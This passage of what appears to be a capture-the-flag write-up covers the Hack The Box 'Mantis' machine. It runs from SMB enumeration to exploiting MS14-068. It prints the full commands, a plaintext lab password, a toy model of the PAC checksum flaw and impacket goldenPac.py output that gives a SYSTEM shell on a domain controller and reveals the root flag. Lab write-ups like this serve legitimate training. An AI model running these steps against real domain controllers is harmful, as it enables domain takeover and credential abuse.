  .                                   D        0  Thu Aug 31 20:05:19 2017
  ..                                  D        0  Thu Aug 31 20:05:19 2017
                5217023 blocks of size 4096. 939173 blocks available
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\> cd MACHINE
cd \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\MACHINE\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\> ls
  .                                   D        0  Thu Aug 31 20:05:19 2017
  ..                                  D        0  Thu Aug 31 20:05:19 2017
                5217023 blocks of size 4096. 939173 blocks available
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\> cd ../
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd MACHINE
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> ls
  .                                   D        0  Thu Aug 31 20:08:27 2017
  ..                                  D        0  Thu Aug 31 20:08:27 2017
  Microsoft                           D        0  Thu Aug 31 20:05:19 2017
  Registry.pol                        A     2782  Thu Aug 31 20:08:27 2017

                5217023 blocks of size 4096. 939173 blocks available
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> get Registry.pol
getting file \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2782 as Registry.pol (1.9 KiloBytes/sec) (average 1.9 KiloBytes/sec)
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> 

Tried polenum on it (polenum pulls the password policy over SAMR; it does not parse Registry.pol) and nothing useful came of it. This was a rabbit hole, so I looked for hints

The SID we got before will be useful

the machine is vulnerable to MS14-068 (CVE-2014-6324): an unpatched 2008 R2 KDC validated PAC signatures but accepted unkeyed checksum types, so any authenticated domain user can forge a PAC claiming Domain Admins membership and have the DC issue a TGT that carries it. Exploiting it needs a valid domain account (james) and that account's SID

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek

usage

USAGE:
ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>
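To make the bug concrete, here is an added example (not from the original write-up, and not code from pykek or impacket) that models the PAC signature check the KDC performed before and after the MS14-068 patch. The checksum type numbers are the real Kerberos ones (RFC 3961 / RFC 4757 / MS-KILE); the PAC bytes, the krbtgt key and the HMAC constructions are a deliberately simplified toy, not the real PAC_SIGNATURE_DATA layout, and the block is a model of the logic flaw, not a working exploit.

```python
"""Added example: simplified model of the PAC signature check broken by MS14-068.

The pre-patch KDC verified the signature over the PAC with whatever checksum
type the signature block named, including unkeyed ones (CRC32, RSA-MD5). An
attacker cannot compute a keyed HMAC without the krbtgt key, but can compute
MD5, so a forged PAC "signed" with MD5 validated. The patch rejects unkeyed
checksum types. Everything below other than the type numbers is a toy model.
"""
import hashlib
import hmac
import os
import zlib

# Kerberos checksum type numbers (RFC 3961 / RFC 4757 / MS-KILE).
KERB_CHECKSUM_CRC32 = 1
KERB_CHECKSUM_RSA_MD5 = 7
KERB_CHECKSUM_HMAC_MD5 = -138
KERB_CHECKSUM_HMAC_SHA1_96_AES256 = 16
KEYED_TYPES = {KERB_CHECKSUM_HMAC_MD5, KERB_CHECKSUM_HMAC_SHA1_96_AES256}

DOMAIN_USERS_RID = 513
DOMAIN_ADMINS_RID = 512


def checksum(ctype, data, key=None):
    """Compute a checksum of the given type; unkeyed types ignore the key."""
    if ctype == KERB_CHECKSUM_RSA_MD5:
        return hashlib.md5(data).digest()
    if ctype == KERB_CHECKSUM_CRC32:
        return zlib.crc32(data).to_bytes(4, "little")
    if ctype == KERB_CHECKSUM_HMAC_MD5:
        return hmac.new(key, data, hashlib.md5).digest()        # simplified RFC 4757
    if ctype == KERB_CHECKSUM_HMAC_SHA1_96_AES256:
        return hmac.new(key, data, hashlib.sha1).digest()[:12]  # simplified RFC 3962
    raise ValueError("unsupported checksum type %d" % ctype)


def kdc_accepts_pac(pac, sig_type, sig, krbtgt_key, patched):
    """Model of the KDC signature check before (patched=False) and after MS14-068."""
    if patched and sig_type not in KEYED_TYPES:
        return False  # post-patch: only keyed checksum types are acceptable
    key = krbtgt_key if sig_type in KEYED_TYPES else None
    expected = checksum(sig_type, pac, key)
    return hmac.compare_digest(expected, sig)


def forge_pac(group_rids):
    """Toy PAC: a byte string naming the group RIDs the attacker wants to hold."""
    return b"PAC|groups=" + ",".join(str(r) for r in group_rids).encode()


def attack(patched):
    """Attacker who never sees the krbtgt key signs a Domain Admins PAC with plain MD5."""
    krbtgt_key = os.urandom(16)  # known only to the DC
    pac = forge_pac([DOMAIN_USERS_RID, DOMAIN_ADMINS_RID])
    sig = checksum(KERB_CHECKSUM_RSA_MD5, pac)
    return kdc_accepts_pac(pac, KERB_CHECKSUM_RSA_MD5, sig, krbtgt_key, patched)


if __name__ == "__main__":
    print("unpatched KDC accepts MD5-signed forged PAC:", attack(patched=False))
    print("patched KDC accepts MD5-signed forged PAC:  ", attack(patched=True))
```

The real tools (pykek, goldenPac.py) do the rest of the dance: request a TGT without a PAC, then submit a TGS-REQ carrying the forged PAC so the vulnerable KDC returns a TGT whose PAC now lists Domain Admins. That is why the only inputs they need are a valid domain user, its password and its SID.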


┌──(kali㉿kali)-[~/Downloads]
└─$ wget https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS14-068/pykek/ms14-068.py
--2023-09-22 08:51:17--  https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS14-068/pykek/ms14-068.py
Resolving github.com (github.com)... 20.248.137.48
Connecting to github.com (github.com)|20.248.137.48|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46695 (46K) [text/plain]
Saving to: ‘ms14-068.py’

ms14-068.py                    100%[=================================================>]  45.60K  --.-KB/s    in 0.08s   

2023-09-22 08:51:18 (552 KB/s) - ‘ms14-068.py’ saved [46695/46695]

                                                                                                                         
┌──(kali㉿kali)-[~/Downloads]
└─$ cp ms14-068.py ~/HTB/mantis                                   
                                                                                                                         

the user SID we got earlier with rpcclient

rpcclient $> lookupnames james
james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)
rpcclient $> 

running the script kept failing. Under python3 it dies on Python 2 print syntax (pykek is a Python 2 tool); under python2 and python2.7 it fails with ImportError on kek.ccache, because only ms14-068.py was downloaded while the script imports the kek/ package that sits next to it in the repository. Cloning the whole pykek directory fixes that; rather than chase it, I moved on to impacket's goldenPac.py, which implements the same attack

┌──(kali㉿kali)-[~/HTB/mantis]
└─$ python2.7  ms14-068.py -u james@htb.local -p 'J@m3s_P@ssW0rd!' -d 10.10.10.52 -s S-1-5-21-4220043660-4019079961-2895681657-1103
Traceback (most recent call last):
  File "ms14-068.py", line 17, in <module>
    from kek.ccache import CCache, get_tgt_cred, kdc_rep2ccache
ImportError: No module named kek.ccache
                                                                                                                         
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ python  ms14-068.py -u james@htb.local -p 'J@m3s_P@ssW0rd!' -d 10.10.10.52 -s S-1-5-21-4220043660-4019079961-2895681657-1103   
  File "/home/kali/HTB/mantis/ms14-068.py", line 149
    print 'ERROR:', e
    ^^^^^^^^^^^^^^^^^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?
                                                                                                                         
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ python2  ms14-068.py -u james@htb.local -p 'J@m3s_P@ssW0rd!' -d 10.10.10.52 -s S-1-5-21-4220043660-4019079961-2895681657-1103
Traceback (most recent call last):
  File "ms14-068.py", line 17, in <module>
    from kek.ccache import CCache, get_tgt_cred, kdc_rep2ccache
ImportError: No module named kek.ccache
                                                                                                                         

tried goldenPac.py, which does the whole thing end to end: it resolves the user and forest SIDs itself, forges the PAC, obtains a TGT as Domain Admin and then drops into a psexec-style shell on the DC. Two caveats: it uploads a randomly named executable to ADMIN$ and creates a service, which is noisy, and Kerberos needs the client clock within a few minutes of the DC (the scan showed no skew)

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./goldenPac.py htb.local/james:J@m3s_P@ssW0rd\!@10.10.10.52
Impacket v0.11.0 - Copyright 2023 Fortra

[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file gHZVxsPx.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service VAjq on mantis.htb.local.....
[*] Starting service VAjq.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>

C:\>cd users
 
C:\Users>cd admi
b'The system cannot find the path specified.\r\n'
C:\Users>cd administrator
 
C:\Users\Administrator>cd desktop
 
C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 3292-4936

 Directory of C:\Users\Administrator\Desktop

02/08/2021  01:44 PM    <DIR>          .
02/08/2021  01:44 PM    <DIR>          ..
09/22/2023  09:36 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,841,724,416 bytes free

C:\Users\Administrator\Desktop>type root.txt
ccada3f6a7bfe7c33068a653a56c51de

C:\Users\Administrator\Desktop>